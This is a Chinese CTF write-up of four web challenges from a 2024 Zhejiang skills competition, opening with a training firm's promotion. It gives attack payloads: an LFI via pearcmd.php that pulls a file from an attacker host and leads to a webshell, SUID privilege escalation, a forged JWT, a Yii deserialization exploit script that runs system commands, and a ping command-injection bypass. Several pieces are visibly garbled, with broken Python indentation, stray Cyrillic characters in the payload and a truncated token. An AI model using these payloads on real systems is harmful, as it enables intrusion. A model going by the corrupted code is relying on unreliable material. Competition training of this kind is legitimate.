2024年浙江省信息通信行业职业技能竞赛信息安全测试员竞赛CTF比赛WEB部分

浙江省信息通信行业职业技能竞赛信息安全测试员竞赛CTF比赛WEB部分

Author：Ns100kUp
From：极安云科-服务中心
Data：2024/08/07
Copyright:本内容版权归属极安云科，未经授权不得以任何形式复制、转载、摘编和使用。
1
2
3
4

培训、环境、资料、考证
公众号：Geek极安云科
网络安全群：624032112
网络系统管理群：223627079 
网络建设与运维群：870959784 

极安云科专注于技能提升，赋能
2024年广东省高校的技能提升，受赋能的客户院校均获奖！
2024年江苏省赛一二等奖前13名中，我们赋能客户占五支队伍！
2024年湖南省赛赋能三所院校均获奖！
2024年山东省赛赋能两所院校均获奖！
2024年湖北省赛赋能参赛院校九支队伍，共计斩获一等奖2项、三等奖7项!
1
2
3
4
5
6
7
8
9
10
11
12

web 为 docker 容器环境，这里记录题目特点或许能够寻找到同源题

1.Filet-o-Fish

Filet-o-Fish：文件上传工具

页面存在文件上传点和list功能

应该是通过list来进行目录遍历或者任意文件读取，测试后存在目录穿越

测试好久没有办法写马，最后测试得到利用pearcmd.php可以把让服务器下载本地起的web文件

payload：http://localhost:8388/list.php?+download +http://xxxx:xxxx/test.php?a=1&file=…/…/…/…/usr/local/lib/php/pearcmd.php

成功写入phpinfo，直接写webshell，连接菜刀后发现flag文件没有权限需要提权，查看suid发现存在base命令，利用base命令对文件编码后解码即可

2.EzLogin

EzLogin：简单登陆

构造管理员弱口令无效，任意用户登录为guest用户，查看源代码发现hint

肯定是要伪造admin，看cookie发现通过jwt实现登录验证，应该要伪造jwt

利用jwtcrack爆破,秘钥F4b6

伪造jwtcookie：eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2V4YW1wbGUuY29tIiwic3ViIjoiaW5zdGFuY2UiLCJhdWQiOlsiYXBwIl0sImV4cCI6MTU4NjM4NTk4ODQyMDAsImp0aSI6IjE1ODYzODU5ODg0MjAwMSIsInNjb3BlIjoib3BlcmF0aW9ucyJ9.Z6yqFNdsCJJ3Bgvttll7O3xFderul
1

3.ezyii

ezyii：简单的yiicms

根据题目名称为yii-gii模块的php任意文件读取

后台弱口令

可以读取验证cookie的key，所以存在反序列化漏洞

这里采用sha1 hash加密校验

可以用widget创建任意类的实例

创建后调用实例init() run(),找到CDetailView类可以利用，CVE-2014-4672

exp：

import hashlib
import hmac
from urllib.parse import unquote
import requests

import re

url = "http://localhost:8000/"

headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def get_secretKey():
    session = requests.session()
    login_url = url+"index.php?r=gii/default/login"
    data="LoginForm%5Bpassword%5D=admin&yt0=Enter"
    session.post(url=login_url,data=data,headers=headers)
    flag_url = url+"index.php?r=gii/form/diff&id=0"
data="FormCode%Bmodel%5D=User&FormCode%BviewName%5D=main&FormCode%BviewPath%5D=application.config&FormCode%Bscenario%5D=123&FormCode%Btemplate%5D=default&answers="
res = session.post(url=flag_url, data=data, headers=headers)

match_group = re.findall(r"validationKey' => '(.*)'", res.text)

try:
    secret_key = match_group[0]
    return secret_key
except:
    print("exp4 attack error")

def hmac_sha1_encrypt(key, data) -> str:
    hmac_sha1 = hmac.new(key.encode('utf-8'), data.encode('utf-8'), hashlib.sha1)
    return hmac_sha1.hexdigest()

if __name__ == "__main__":
    secretkey = get_secretKey()
    print(secretkey)
    unser="0%3A11%3A%22CDbCriteria%22%3A17%3A%7Bs%3A6%3A%22select%22%3Ba%3A1%3A%7Bs%3A3%3A%22f00%22%3B0%3A18%3A%22CFormButtonElement%22%3A9%3A%7Bs%3A4%3A%22type%22%3Bs%3A23%3A%22zii.widgets.CDetailView%22%3Bs%3A4%3A%22name%22%3BN%3Bs%3A5%3A%22label%22%3BN%3Bs%3A23%3A%22%00CFormButtonElement%00 on%22%3BN%3Bs%3A10%3A%22attributes%22%3Ba%3A2%3A%7Bs%3A10%3A%22attributes%22%ЗBa%ЗA1%ЗA%7Bi%ЗA0%3Ba%3A1%3A%7Bs%3A5%3A%22value%22%ЗBa%ЗA2%ЗA%7Bi%3A0%3Bs%3A10%3A%22CComponent%22%3Bi%3A1%3Bs%3A18%3A%22evaluateExpression%22%3B%7D%7D%7Ds%3A4%3A%22data%22%3Bs%3A26%3A%22die%28system%28%24POST%5B%22pwd%22%5D%29%29%22%3B%7Ds%3A21%3A%22%00CFormElement%00_parent%22%3BO%3A17%3A%22CWidget%22%3A%22actionPrefix%22%3BO%3A4%3A%22skin%22%3BO%3A7%3A%22default%22%3Bs%3A12%3A%22CWidget%00_id%22%3BO%3A15%3A%22owner%22%3BO%3A14%3A%22SiteController%22%3BO%3A15%3A%22layout%22%3BO%3A17%3A%22F%2FForms%2FFormLayouts%2FFcolumn1%22%3BO%3A4%3A%22menu%22%3BA%3AO%3A%22breadcrumbs%22%3BO%3A0%3A%22defaultAction%22%3BO%3A5%3A%22index%22%3BO%3A16%3A%22CController%00_id%22%3BO%3A4%3A%22site%22%3BO%3A20%3A%22action%22%3BO%3A13%3A%22InlineAction%22%3BO%3A4%3A%22%00_id%22%3BO%3A5%3A%22user%22%3BO%3A20%3A%22controller%22%3BO%3A19%3A%22Component%00_e%22%3BO%3A14%3A%22Component%00_m%22%3BO%3A23%3A%22Controller%00_pageTitle%22%3BO%3A26%3A%22Controller%00_cachingStack%22%3BO%3A19%3A%22Controller%00_clips%22%3BO%3A27%3A%22Controller%00_dynamicOutput%22%3BO%3A24%3A%22Controller%00_pageStates%22%3BO%3A20%3A%22Controller%00_module%22%3BO%3A29%3A%22BaseController%00_widgetStack%22%3BA%3AO%3A%22Component%00_e%22%3BO%3A14%3A%22Component%00_m%22%3BO%3A29%3A%22BaseController%00_widgetStack%22%3BA%3AO%3A%22Component%00_e%22%3BO%3A14%3A%22Component%00_m%22%3BO%3A22%3A%22FormElement%00_visible%22%3BO%3A14%3A%22Component%00_e%22%3BO%3A14%3A%22Component%00_m%22%3BO%3A8%3A%22distinct%22%3BO%3A0%3A%22condition%22%3BO%3A9%3A%22params%22%3BO%3A4%3A%22aycp%22%3BO%3A3%3A%22foo%22limit%22%3Bi%3A6%22offset%22%3Bi%3A-1%22order%22%3Bs%3A0%22group%22%3Bs%3A0%22join%22%3Bs%3A0%22having%22%3Bs%3A0%22with%22%3B*N%22alias%22%3B*N%22together%22%3B*N%22index%22%3B*N%22scopes%22%3B*N%22Component_e%22%3B*N%22Component_m%22%3BN%3B%7D"
    
    sign = hmac_sha1_encrypt(secretkey,unquote(unser))
cookies = {
    "data":sign+unser
}
	res = requests.post(url=url+"?r=site",cookies=cookies,data={"pwd":"cat /flag"})
	print(res.text)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

4.EzRCE

经典的ping命令执行题，经过测试大部分字符被过滤，(存在过滤: flag 关键字被过滤，* 关键字被过滤，？关键字被过滤，空格关键字被过滤[可用 %09绕过]，cat可以用nl)

通过POST传payload：hostname=0;nl%09/fl’'ag_is_h3r[a-z]